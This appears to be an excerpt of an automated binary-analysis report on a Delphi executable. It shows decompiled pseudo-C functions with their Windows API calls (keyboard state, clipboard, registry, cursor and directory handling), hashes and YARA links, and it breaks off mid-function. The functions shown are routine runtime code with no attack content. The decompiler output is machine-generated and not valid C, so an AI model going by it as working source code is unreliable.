Opcode Fuzzy Hash: 89fce574dff8b7ea05d7ff18270542b8e03307a4a7e45fe49de226960ab66071
Instruction Fuzzy Hash: C9417271A003189BDB20DF65CC81B9EB7F9AF48304F0055BAE445E7392DB78AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00436824, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00436824(void* __eax, RECT* __ecx, intOrPtr __edx) {
				char _v5;
				struct tagPOINT _v13;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				struct tagRECT _v44;
				signed short _t43;
				intOrPtr* _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t64;
				intOrPtr _t65;
				int _t72;
				intOrPtr _t73;
				void* _t76;
				void* _t79;
				void* _t80;
				RECT* _t81;
				intOrPtr* _t84;
				void* _t92;
				void* _t95;

				_t81 = __ecx;
				asm("movsd");
				asm("movsd");
				_v20 = __edx;
				_v28 = 0;
				if( *0x48fba8 == 0) {
					L20:
					_t39 =  &_v28; // 0x436ae2
					return  *_t39;
				}
				_t43 = GetKeyState(0x11);
				_t84 =  *0x48e6ec; // 0x48fbfc
				if(((_t43 & 0xffffff00 | (_t43 & 0x00008000) != 0x00000000) ^  *( *_t84 + 0xb4)) == 0) {
					goto L20;
				}
				_t46 =  *0x48fbac; // 0x0
				 *((intOrPtr*)( *_t46 + 8))();
				_t48 =  *0x48fba8; // 0x0
				_t79 =  *((intOrPtr*)(_t48 + 8)) - 1;
				if(_t79 < 0) {
					L15:
					_t49 =  *0x48fbac; // 0x0
					if( *((intOrPtr*)(_t49 + 8)) > 0) {
						_t53 =  *0x48fbac; // 0x0
						_v28 = E00436038(_t53, _t81);
					}
					if(_v28 != 0 && E00436648(_v28, _t81, _t95) == 0) {
						_v28 = 0;
					}
					goto L20;
				} else {
					_t80 = _t79 + 1;
					_t92 = 0;
					do {
						_t55 =  *0x48fba8; // 0x0
						_v24 = E004140D0(_t55, _t92);
						if(_v24 != _v20 &&  *((char*)(_v24 + 0x1a6)) != 0 &&  *((intOrPtr*)( *_v24 + 0x50))() != 0 && IsWindowVisible(E0043F370(_v24)) != 0) {
							_t64 = E004367E0(_t95);
							_pop(_t81);
							if(_t64 != 0) {
								goto L14;
							}
							_t65 = _v20;
							_t106 =  *((intOrPtr*)(_t65 + 0xa0)) - _v24;
							if( *((intOrPtr*)(_t65 + 0xa0)) != _v24) {
								L11:
								_v5 = 1;
								_push( &_v13);
								_push( &_v5);
								_t81 =  &_v44;
								E004037B0(_v24, _t107);
								if(_v5 != 0) {
									_push(_v13.y);
									_t72 = PtInRect( &_v44, _v13);
									_t109 = _t72;
									if(_t72 != 0) {
										_t73 =  *0x48fbac; // 0x0
										E00435FA8(_t73, _v24, _t109);
									}
								}
								goto L14;
							}
							_t76 = E0043DF04(_v24, _t81, _t106);
							_t107 = _t76 - 1;
							if(_t76 - 1 <= 0) {
								goto L14;
							}
							goto L11;
						}
						L14:
						_t92 = _t92 + 1;
						_t80 = _t80 - 1;
					} while (_t80 != 0);
					goto L15;
				}
			}

0x00436824
0x00436832
0x00436833
0x00436834
0x00436839
0x00436843
0x00436973
0x00436973
0x0043697c
0x0043697c
0x0043684b
0x00436857
0x00436865
0x00000000
0x00000000
0x0043686b
0x00436872
0x00436875
0x0043687d
0x00436880
0x00436942
0x00436942
0x0043694b
0x0043694d
0x00436957
0x00436957
0x0043695e
0x00436970
0x00436970
0x00000000
0x00436886
0x00436886
0x00436887
0x00436889
0x0043688b
0x00436895
0x0043689e
0x004368d3
0x004368d8
0x004368db
0x00000000
0x00000000
0x004368dd
0x004368e6
0x004368e9
0x004368f6
0x004368f6
0x004368fd
0x00436901
0x00436902
0x0043690f
0x00436918
0x0043691a
0x00436924
0x00436929
0x0043692b
0x00436930
0x00436935
0x00436935
0x0043692b
0x00000000
0x00436918
0x004368ee
0x004368f3
0x004368f4
0x00000000
0x00000000
0x00000000
0x004368f4
0x0043693a
0x0043693a
0x0043693b
0x0043693b
0x00000000
0x00436889

APIs

GetKeyState.USER32(00000011), ref: 0043684B
IsWindowVisible.USER32(00000000), ref: 004368C9

Part of subcall function 004367E0: IsChild.USER32(00000000,00000000), ref: 00436810

PtInRect.USER32(?,?,?), ref: 00436924

Strings

jC, xrefs: 00436973
jC, xrefs: 00436961

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildRectStateVisibleWindow
String ID: jC$jC
API String ID: 2086824273-3820844482
Opcode ID: f517b2d35b0091c3793185a10c490c7056731f6d085933b575e6424195840147
Instruction ID: 7bb97f628d94c67668981898db818b834c320267823456bab039fb95cc1fa072
Opcode Fuzzy Hash: f517b2d35b0091c3793185a10c490c7056731f6d085933b575e6424195840147
Instruction Fuzzy Hash: 9D415171A0010AAFCB01DB59D481BDFB7B5EF08308F259166E504E73A1D774AD85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00436E9C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00436E9C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HWND__* _t37;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr* _t52;
				long _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				long long _t86;

				_t86 = __fp0;
				_t79 = _t78 + 0xfffffff8;
				_t69 = __ecx;
				_t44 = __edx;
				_t76 = __eax;
				 *0x48fb84 = __eax;
				_t24 =  *0x48fb84; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x48fb90);
				_t26 =  *0x48fb84; // 0x0
				_t57 = 0x48fb90->x; // 0x0
				 *(_t26 + 0xc) = _t57;
				_t58 =  *0x48fb94; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
				 *0x48fb98 = GetCursor();
				_t28 =  *0x48fb84; // 0x0
				"SPh`bC"();
				 *0x48fb8c = _t28;
				 *0x48fb9c = _t69;
				_t59 =  *0x433bf0; // 0x433c3c
				if(E00403740(_t76, _t59) == 0) {
					__eflags = _t44;
					if(__eflags == 0) {
						 *0x48fba0 = 0;
					} else {
						 *0x48fba0 = 1;
					}
				} else {
					_t64 = _t76;
					_t4 = _t64 + 0x44; // 0x44
					_t40 = _t4;
					_t48 =  *_t40;
					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t64 + 0x20)) = 0;
						 *((intOrPtr*)(_t64 + 0x24)) = 0;
					} else {
						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t64 + 0x20)) = __fp0;
						asm("wait");
					}
					_t65 =  *((intOrPtr*)(_t40 + 4));
					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t76 + 0x28)) = 0;
						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
					} else {
						_t52 = _t76;
						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t52 + 0x28)) = _t86;
						asm("wait");
					}
					if(_t44 == 0) {
						 *0x48fba0 = 0;
					} else {
						 *0x48fba0 = 2;
						 *((intOrPtr*)( *_t76 + 0x30))();
					}
				}
				_t31 =  *0x48fb84; // 0x0
				 *0x48fba4 =  *((intOrPtr*)( *_t31 + 8))();
				_t84 =  *0x48fba4;
				if( *0x48fba4 != 0) {
					_t36 =  *0x48fb94; // 0x0
					_t37 = GetDesktopWindow();
					_t38 =  *0x48fba4; // 0x0
					E00440D20(_t38, _t37, _t84, _t36);
				}
				_t34 = E00403584(1);
				 *0x48fbac = _t34;
				if( *0x48fba0 != 0) {
					_t34 = E00436BCC(0x48fb90, 1);
				}
				return _t34;
			}

0x00436e9c
0x00436e9f
0x00436ea2
0x00436ea4
0x00436ea6
0x00436ea8
0x00436eae
0x00436eb5
0x00436ebd
0x00436ec2
0x00436ec7
0x00436ecd
0x00436ed0
0x00436ed6
0x00436ede
0x00436ee3
0x00436ee8
0x00436eed
0x00436ef2
0x00436efa
0x00436f07
0x00436f99
0x00436f9b
0x00436fa6
0x00436f9d
0x00436f9d
0x00436f9d
0x00436f0d
0x00436f0d
0x00436f0f
0x00436f0f
0x00436f15
0x00436f1b
0x00436f3d
0x00436f3f
0x00436f42
0x00436f1d
0x00436f22
0x00436f25
0x00436f2d
0x00436f31
0x00436f35
0x00436f37
0x00436f3a
0x00436f3a
0x00436f48
0x00436f4f
0x00436f74
0x00436f76
0x00436f79
0x00436f51
0x00436f51
0x00436f58
0x00436f5b
0x00436f64
0x00436f68
0x00436f6c
0x00436f6e
0x00436f71
0x00436f71
0x00436f7e
0x00436f90
0x00436f80
0x00436f80
0x00436f8b
0x00436f8b
0x00436f7e
0x00436fad
0x00436fb7
0x00436fbc
0x00436fc3
0x00436fc5
0x00436fcb
0x00436fd8
0x00436fdd
0x00436fdd
0x00436fe9
0x00436fee
0x00436ffa
0x00437001
0x00437001
0x0043700b

APIs

GetCursorPos.USER32(0048FB90), ref: 00436EBD
GetCursor.USER32(0048FB90), ref: 00436ED9

Part of subcall function 004360DC: SetCapture.USER32(00000000,00000001,00436EED,0048FB90), ref: 004360EB

GetDesktopWindow.USER32 ref: 00436FCB

Strings

0_C, xrefs: 00436FE4
<<C, xrefs: 00436EFA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: 0_C$<<C
API String ID: 669539147-1233367007
Opcode ID: 0647aab09b97290ffcb3a07a04ef953ac86450df05c6cc5be72a4360306d67ad
Instruction ID: 868fc49dae36dac0df15edeb276aa526b95886d61c05595a35af53607f0a97a2
Opcode Fuzzy Hash: 0647aab09b97290ffcb3a07a04ef953ac86450df05c6cc5be72a4360306d67ad
Instruction Fuzzy Hash: 34419EB4204201DFC304DF29E96461ABBE1BB8C364F16C97EE0498B362DB35E849CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4FC, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A4FC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a6b7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x48e6f0; // 0x407520
					E00406520(_t52,  &_v8);
				} else {
					_t86 =  *0x48e860; // 0x407518
					E00406520(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x48e7b8; // 0x4074c0
					E00406520(_t60,  &_v372);
					E0040A124(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404588( &_v340, 0x105,  &_v297);
					E00408A48(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x48e764; // 0x407570
					E00406520(_t82,  &_v344);
					E0040A124(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A6BE);
				E00404320( &_v372);
				E00404344( &_v344, 3);
				return E00404320( &_v8);
			}

0x0040a4fc
0x0040a509
0x0040a50f
0x0040a515
0x0040a51b
0x0040a521
0x0040a526
0x0040a527
0x0040a52c
0x0040a52f
0x0040a535
0x0040a53c
0x0040a550
0x0040a555
0x0040a53e
0x0040a541
0x0040a546
0x0040a546
0x0040a55a
0x0040a567
0x0040a573
0x0040a62f
0x0040a635
0x0040a63f
0x0040a645
0x0040a64c
0x0040a652
0x0040a668
0x0040a66d
0x0040a67f
0x0040a596
0x0040a599
0x0040a59f
0x0040a5b7
0x0040a5c8
0x0040a5d3
0x0040a5d9
0x0040a5e3
0x0040a5e9
0x0040a5f0
0x0040a5f6
0x0040a60c
0x0040a611
0x0040a623
0x0040a628
0x0040a688
0x0040a68b
0x0040a68e
0x0040a699
0x0040a6a9
0x0040a6b6

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A6B7), ref: 0040A567
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A6B7), ref: 0040A589

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Strings

pu@, xrefs: 0040A60C
~@, xrefs: 0040A61E, 0040A67A
u@, xrefs: 0040A550

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: u@$ ~@$pu@
API String ID: 902310565-2810613298
Opcode ID: 49bdfd7ffdcc6dc76c1208d79f8952532d69cb373c48499442734dfe3413d71e
Instruction ID: 3d4fd221561994e078157927074f4b75dba3c298c2c4c624566ae571ef672628
Opcode Fuzzy Hash: 49bdfd7ffdcc6dc76c1208d79f8952532d69cb373c48499442734dfe3413d71e
Instruction Fuzzy Hash: 2B413630900658DFDB20DF65DC81BDEB7F4AB49304F4044EAE908AB291D778AE94CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0043260C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0043260C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x4326ae);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x48e524; // 0x41d2fc
					E0040A1A4(_t29, 1);
					E00403D80();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x4326b5);
				} else {
					while(1) {
						_t16 = E004222F4(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E00422204(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E2C();
					return _t24;
				}
				L6:
			}

0x00432613
0x00432615
0x0043261d
0x00432622
0x00432623
0x00432628
0x0043262b
0x00432635
0x00432637
0x0043263a
0x00432681
0x00432681
0x0043268e
0x00432693
0x00432698
0x0043269a
0x0043269d
0x004326ad
0x0043263c
0x0043263c
0x00432643
0x00432648
0x0043264a
0x00000000
0x00000000
0x0043267a
0x0043267c
0x0043267f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043267f
0x00432650
0x00432665
0x0043266a
0x004326ba
0x004326ba
0x00000000

APIs

EnumClipboardFormats.USER32(00000000,00000000,004326AE), ref: 00432630
GetClipboardData.USER32 ref: 00432650
GetClipboardData.USER32 ref: 00432659
EnumClipboardFormats.USER32(00000000,00000000,00000000,004326AE), ref: 00432675

Strings

lw@, xrefs: 00432689

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$DataEnumFormats
String ID: lw@
API String ID: 1256399260-2821604855
Opcode ID: 40ecbce39717903af30691bdfb332a16639d0e3130d703441a8a4c908bdab455
Instruction ID: f3266d62fa59fde523ff37e644adff5ef05723a53766d82c8475c8e7dbbf3540
Opcode Fuzzy Hash: 40ecbce39717903af30691bdfb332a16639d0e3130d703441a8a4c908bdab455
Instruction Fuzzy Hash: A011E371700200AFDA00EF66EA5296A77E9EF8D358B10007BF9049B391DDB99C1196A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040342C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040342C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47100c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47100c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47100c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E0040349D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034a4);
					return RegCloseKey(_v8);
				}
			}

0x0040342d
0x0040342f
0x00403439
0x00403455
0x004034a4
0x004034b6
0x004034b9
0x004034c2
0x00403457
0x00403459
0x0040345a
0x0040345f
0x00403462
0x00403465
0x00403481
0x00403488
0x0040348b
0x0040348e
0x0040349c
0x0040349c

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403444
FPUMaskValue, xrefs: 00403478

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 849114cac64487da2203560a0741183ae2dbbad8fafeb926836a7176adce9f49
Instruction ID: 7e82fee9bd4af98ce6fec7a920c5848dee0106fdfb5f57a5500131e2059f6c8c
Opcode Fuzzy Hash: 849114cac64487da2203560a0741183ae2dbbad8fafeb926836a7176adce9f49
Instruction Fuzzy Hash: 8101B579510348BAEB12DF91CD02BA9B7ACDB04B15F2044B6B904E6AD0E6785A50C75C

Uniqueness

Uniqueness Score: -1.00%

Function 004028FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004028FC(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404588(_t25, 0x105,  &_v532);
			}

0x00402904
0x00402906
0x0040290a
0x00402914
0x00402917
0x0040291c
0x0040292e
0x00402934
0x00402934
0x00402943
0x0040294a
0x00402954
0x00402954
0x00402971

APIs

GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,00468B87), ref: 0040292E
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,00468B87), ref: 00402934
GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,00468B87), ref: 00402943
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,00468B87), ref: 00402954

Strings

:, xrefs: 00402917

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e34b70673b6ddc3234c340ae9250c5dc95551a513d277a8d133446c9483d1341
Instruction ID: e280489c4e77a9dbbac942a73009b5f8a6c13a22013b3f11ed9b453d4861a154
Opcode Fuzzy Hash: e34b70673b6ddc3234c340ae9250c5dc95551a513d277a8d133446c9483d1341
Instruction Fuzzy Hash: 9FF096763446C05AE310E6688852BDB72DC8B55344F04442EBBC8D73C2E6B8994857A7

Uniqueness

Uniqueness Score: -1.00%

Function 0045F454, Relevance: 7.8, APIs: 5, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045F454(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E00462E5C( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E00462E3C( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420244( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045EC84( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045D9B8(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E00420140( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041F7B8( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E0041FE50(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
